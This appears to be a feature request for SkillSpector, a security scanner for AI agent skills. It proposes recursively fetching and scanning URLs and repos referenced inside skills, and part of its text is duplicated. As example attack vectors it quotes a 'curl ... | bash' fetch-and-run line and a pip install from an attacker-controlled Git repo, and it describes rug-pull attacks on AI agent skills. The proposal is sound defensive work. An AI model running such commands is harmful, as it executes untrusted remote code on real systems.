Problem
SkillSpector currently resolves the top-level input once (resolve_input.py) and then scans only those local files. Any URLs or repository references found inside the scanned files are never followed — analysis stops at the boundary of the input skill.
This creates a blind spot for a realistic attack pattern: a skill that appears clean on its own but delegates execution to an external source at runtime.
Example vectors:
- A shell script in the skill bundle that does
curl https://external-host/setup.sh | bash — the URL is detected as a pattern, but if setup.sh itself contains the malicious payload, it is never scanned.
- A SKILL.md that references a companion repo (
pip install git+https://github.com/attacker/lib) — the companion repo's code is never analyzed.
- A skill that looks benign today but links to a repo the attacker controls and can update later (rug-pull via a dependency, not the skill itself).
The OSV.dev queries (osv_client.py) partially address this for named packages, but not for arbitrary Git URLs or raw script fetches.
Proposed feature
Add transitive link scanning as an optional pass after the primary scan:
-
Extract candidate URLs from the scan results — collect all external URLs surfaced by existing analyzers (supply-chain, data-exfiltration, taint-tracking findings already contain them) plus a lightweight pass over file_cache for https?:// references in Markdown links, curl/wget args, pip install git+, npm install, etc.
-
Filter to scannable targets — only follow links that point to something SkillSpector already knows how to resolve: Git repo URLs, .zip archives, raw .md/.sh/.py file URLs. Skip documentation, issue trackers, badges, etc.
-
Recursive resolve_input with a visited set — clone/fetch each candidate into a temp dir, run the full analyzer graph on it, and merge findings back into the parent report with a transitive_depth field on each finding so the output clearly distinguishes direct vs. transitive results.
-
Depth + domain allow/deny list controls — cap recursion depth (e.g. --transitive-depth 1 default, --transitive-depth 2 opt-in) and let users configure trusted domains to skip (e.g. github.com/myorg/*).
-
CLI flag — opt-in via --transitive (off by default to preserve current behavior and scan time).
Why it fits the existing architecture
resolve_input.py already handles Git URLs, zips, raw file URLs, and directories — transitive scanning reuses that exact logic.
- The analyzer registry is already a pure fan-out; running it on a second skill path requires no graph changes.
- Findings from transitive targets can be added to the same
findings list with a source_url / transitive_depth annotation, so meta_analyzer and report nodes are unaffected.
Acceptance criteria
Problem
SkillSpector currently resolves the top-level input once (
resolve_input.py) and then scans only those local files. Any URLs or repository references found inside the scanned files are never followed — analysis stops at the boundary of the input skill.This creates a blind spot for a realistic attack pattern: a skill that appears clean on its own but delegates execution to an external source at runtime.
Example vectors:
curl https://external-host/setup.sh | bash— the URL is detected as a pattern, but ifsetup.shitself contains the malicious payload, it is never scanned.pip install git+https://github.com/attacker/lib) — the companion repo's code is never analyzed.The OSV.dev queries (
osv_client.py) partially address this for named packages, but not for arbitrary Git URLs or raw script fetches.Proposed feature
Add transitive link scanning as an optional pass after the primary scan:
Extract candidate URLs from the scan results — collect all external URLs surfaced by existing analyzers (supply-chain, data-exfiltration, taint-tracking findings already contain them) plus a lightweight pass over
file_cacheforhttps?://references in Markdown links,curl/wgetargs,pip install git+,npm install, etc.Filter to scannable targets — only follow links that point to something SkillSpector already knows how to resolve: Git repo URLs,
.ziparchives, raw.md/.sh/.pyfile URLs. Skip documentation, issue trackers, badges, etc.Recursive
resolve_inputwith a visited set — clone/fetch each candidate into a temp dir, run the full analyzer graph on it, and merge findings back into the parent report with atransitive_depthfield on each finding so the output clearly distinguishes direct vs. transitive results.Depth + domain allow/deny list controls — cap recursion depth (e.g.
--transitive-depth 1default,--transitive-depth 2opt-in) and let users configure trusted domains to skip (e.g.github.com/myorg/*).CLI flag — opt-in via
--transitive(off by default to preserve current behavior and scan time).Why it fits the existing architecture
resolve_input.pyalready handles Git URLs, zips, raw file URLs, and directories — transitive scanning reuses that exact logic.findingslist with asource_url/transitive_depthannotation, someta_analyzerandreportnodes are unaffected.Acceptance criteria
skillspector scan <skill> --transitiveclones/fetches external repo/file links found in the skill and runs the full analyzer suite on eachruleIdprefix orproperties, Markdown section)--transitive) is unchanged